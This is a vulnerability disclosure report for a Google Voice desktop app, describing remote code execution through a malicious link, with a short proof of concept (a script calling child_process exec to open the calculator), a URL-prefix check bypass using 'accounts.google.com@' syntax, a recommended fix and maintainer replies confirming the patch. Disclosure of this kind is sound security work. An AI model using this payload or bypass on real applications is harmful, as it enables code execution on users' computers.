Code Injection in jerrod-lankford/google-voice-desktop-app
Reported on
Sep 12th 2021
✍️ Description
Attackers can execute malicious code on users computers using Google Voice Desktop App provided that users click on a malicious hyperlink in the app itself
🕵️♂️ Proof of Concept
- Host the following index.html on a web server
<script>
require('child_process').exec('calc');
</script>
- Users who click on the hyperlink https://accounts.google.com@[WEB_SERVER]/index.html in the Desktop App (via someone messaging them the link) will execute require('child_process').exec('calc'), which will open the calculator app on the computer.
💥 Impact
This vulnerability is capable of code execution via visiting malicious hyperlink in the application
Recommended Fix
The vulnerability exists because nodeIntegration is set to true so whatever that is embedded in a <script> tag on a webpage will get executed in Node. In addition in https://github.com/jerrod-lankford/google-voice-desktop-app/blob/master/src/main.js#L153L155 only checks if the URL starts with https://accounts.google.com, however example URL https://accounts.google.com@webserver.local actually resolves to webserver.local, but it bypasses the check above. Recommended fix for this is to use NodeJS url.parse and check if host == "accounts.google.com" or "voice.google.com", a better fix (if possible, ) would be to disable nodeIntegration entirely.
📍 Location main.js#L147-L149
SECURITY.md
2 years ago
@admin maintainer email is jllanko@ncsu.edu
I think the bot couldn't detect email format listed in the SECURITY.md
Hey haxatron, thanks for the heads up. I've emailed the maintainer for you.
Sorry i messed up my email in the security.md. Its fixed. I also took care of the vulnerability by parsing the url as suggested. Unfortunately i can't remove node integration. Thanks for letting me know
Hi there, thanks for fixing the vulnerability! Could you validate this report?